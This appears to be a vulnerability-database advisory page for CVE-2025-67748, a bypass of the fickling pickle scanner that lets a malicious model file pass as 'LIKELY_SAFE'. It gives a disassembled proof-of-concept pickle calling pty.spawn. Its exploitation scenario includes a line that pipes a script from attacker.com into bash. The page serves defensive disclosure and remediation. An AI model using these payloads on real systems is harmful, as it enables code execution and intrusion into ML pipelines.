CVE-2025-67748: fickling: Code Injection enables RCE

GHSA-r7v6-mfhq-g3m2 HIGH CISA: ATTEND
Published December 15, 2025
CISO Take

If your ML pipeline uses Fickling to validate pickle files before loading models, your security gate has been bypassable since before the fix in 0.1.6. A crafted pickle embedding pty.spawn() with a single appended BUILD opcode passes Fickling's checks as 'LIKELY_SAFE' while executing arbitrary code on deserialization. Upgrade to fickling >= 0.1.6 immediately and treat any model files previously cleared by older versions from untrusted sources as unvetted.

Risk Assessment

High risk for organizations that rely on Fickling as a model validation control — this is a security control bypass, not just a vulnerability. Exploitability is moderate: a public PoC exists in the advisory and requires only knowledge of pickle opcodes plus awareness of Fickling's heuristic. EPSS is very low (0.00032) and the CVE is not in CISA KEV, indicating no confirmed widespread exploitation yet. However, any targeted attacker aware of Fickling deployments in ML pipelines has a working bypass technique. The blast radius is full arbitrary code execution on whatever host loads the malicious file.

Affected Systems

Package Ecosystem Vulnerable Range Patched
fickling pip < 0.1.6 0.1.6
620 OpenSSF 7.9 57 dependents Pushed 16d ago 100% patched ~5d to patch Full package profile →

Do you use fickling? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.0%
chance of exploitation in 30 days
Higher than 12% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps
  1. Upgrade fickling to >= 0.1.6 immediately — this release patches both the pty blocklist gap (missing from unsafe module imports) and the BUILD opcode bypass of the unused-variable heuristic.

  2. Audit all pickle files validated by fickling < 0.1.6 from untrusted sources since last upgrade — treat them as unverified and re-scan.

  3. Add defense-in-depth: sandbox pickle loading in isolated subprocesses or containers with no network access; use PyTorch's torch.load() with weights_only=True where feasible; enforce allowlist-only module imports at the deserializer level.

  4. Detection: grep fickling scan logs for LIKELY_SAFE verdicts on files containing pty, spawn references, or BUILD opcodes immediately following a REDUCE — these are indicators of the bypass pattern.

  5. Consider supplementing Fickling with static binary analysis of pickle streams independent of heuristic-based tools.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.1.2 - AI supply chain security
NIST AI RMF
MANAGE-2.2 - Risk management mechanisms for AI trustworthiness
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-67748?

If your ML pipeline uses Fickling to validate pickle files before loading models, your security gate has been bypassable since before the fix in 0.1.6. A crafted pickle embedding pty.spawn() with a single appended BUILD opcode passes Fickling's checks as 'LIKELY_SAFE' while executing arbitrary code on deserialization. Upgrade to fickling >= 0.1.6 immediately and treat any model files previously cleared by older versions from untrusted sources as unvetted.

Is CVE-2025-67748 actively exploited?

No confirmed active exploitation of CVE-2025-67748 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-67748?

1. Upgrade fickling to >= 0.1.6 immediately — this release patches both the pty blocklist gap (missing from unsafe module imports) and the BUILD opcode bypass of the unused-variable heuristic. 2. Audit all pickle files validated by fickling < 0.1.6 from untrusted sources since last upgrade — treat them as unverified and re-scan. 3. Add defense-in-depth: sandbox pickle loading in isolated subprocesses or containers with no network access; use PyTorch's torch.load() with weights_only=True where feasible; enforce allowlist-only module imports at the deserializer level. 4. Detection: grep fickling scan logs for LIKELY_SAFE verdicts on files containing pty, spawn references, or BUILD opcodes immediately following a REDUCE — these are indicators of the bypass pattern. 5. Consider supplementing Fickling with static binary analysis of pickle streams independent of heuristic-based tools.

What systems are affected by CVE-2025-67748?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, model registries, MLOps/CI-CD pipelines, agent frameworks.

What is the CVSS score for CVE-2025-67748?

No CVSS score has been assigned yet.

Technical Details

NVD Description

## Fickling Assessment Based on the test case provided in the original report below, this bypass was caused by `pty` missing from our block list of unsafe module imports (as previously documented in #108), rather than the unused variable heuristic. This led to unsafe pickles based on `pty.spawn()` being incorrectly flagged as `LIKELY_SAFE`, and was fixed in https://github.com/trailofbits/fickling/pull/187. ## Original report ### Summary An unsafe deserialization vulnerability in Fickling allows a crafted pickle file to bypass the "unused variable" heuristic, enabling arbitrary code execution. This bypass is achieved by adding a trivial operation to the pickle file that "uses" the otherwise unused variable left on the stack after a malicious operation, tricking the detection mechanism into classifying the file as safe. ### Details Fickling relies on the heuristic of detecting unused variables in the VM's stack after execution. Opcodes like `REDUCE`, `OBJ`, and `INST`, which can be used for arbitrary code execution, leave a value on the stack that is often unused in malicious pickle files. This vulnerability enables a bypass by modifying the pickle file to use this leftover variable. A simple way to achieve this is to add a `BUILD` opcode that, in effect, adds a `__setstate__` to the unused variable. This makes Fickling consider the variable "used," thus failing to flag the malicious file. ### PoC The following is a disassembled view of a malicious pickle file that bypasses Fickling's "unused variable" detection: ``` 0: \x80 PROTO 4 2: \x95 FRAME 26 11: \x8c SHORT_BINUNICODE 'pty' 16: \x94 MEMOIZE (as 0) 17: \x8c SHORT_BINUNICODE 'spawn' 24: \x94 MEMOIZE (as 1) 25: \x93 STACK_GLOBAL 26: \x94 MEMOIZE (as 2) 27: \x8c SHORT_BINUNICODE 'id' 31: \x94 MEMOIZE (as 3) 32: \x85 TUPLE1 33: \x94 MEMOIZE (as 4) 34: R REDUCE 35: \x94 MEMOIZE (as 5) 36: \x8c SHORT_BINUNICODE 'gottem' 44: \x94 MEMOIZE (as 6) 45: b BUILD 46: . STOP ``` Here, the additions to the original pickle file can see on lines 35, 36, 44 and 45. When analyzing this modified file, Fickling fails to identify it as malicious and reports it as **"LIKELY_SAFE"** as seen here: ``` { "severity": "LIKELY_SAFE", "analysis": "Warning: Fickling failed to detect any overtly unsafe code,but the pickle file may still be unsafe.Do not unpickle this file if it is from an untrusted source!\n\n", "detailed_results": {} } ``` ### Impact This allows an attacker to craft a malicious pickle file that can bypass fickling since it relies on the "unused variable" heuristic to flag pickle files as unsafe. A user who deserializes such a file, believing it to be safe, would inadvertently execute arbitrary code on their system. This impacts any user or system that uses Fickling to vet pickle files for security issues.

Exploitation Scenario

An attacker targeting an organization's model ingestion pipeline confirms via job postings or GitHub that the org uses Fickling to screen models. They craft a malicious .pkl file that embeds pty.spawn('/bin/bash', ['/bin/bash', '-c', 'curl attacker.com/implant.sh | bash']) via a REDUCE opcode, then append a BUILD opcode with a dummy value to 'use' the leftover stack variable, neutralizing Fickling's unused-variable heuristic. The file is submitted to the org's internal model registry or a shared community hub the org pulls from. An automated pipeline or data scientist downloads and loads the model — triggering arbitrary code execution on the ML training server or serving container — achieving a foothold for lateral movement into broader ML infrastructure, data stores, or secrets managers.

Timeline

Published
December 15, 2025
Last Modified
January 16, 2026
First Seen
March 24, 2026

Related Vulnerabilities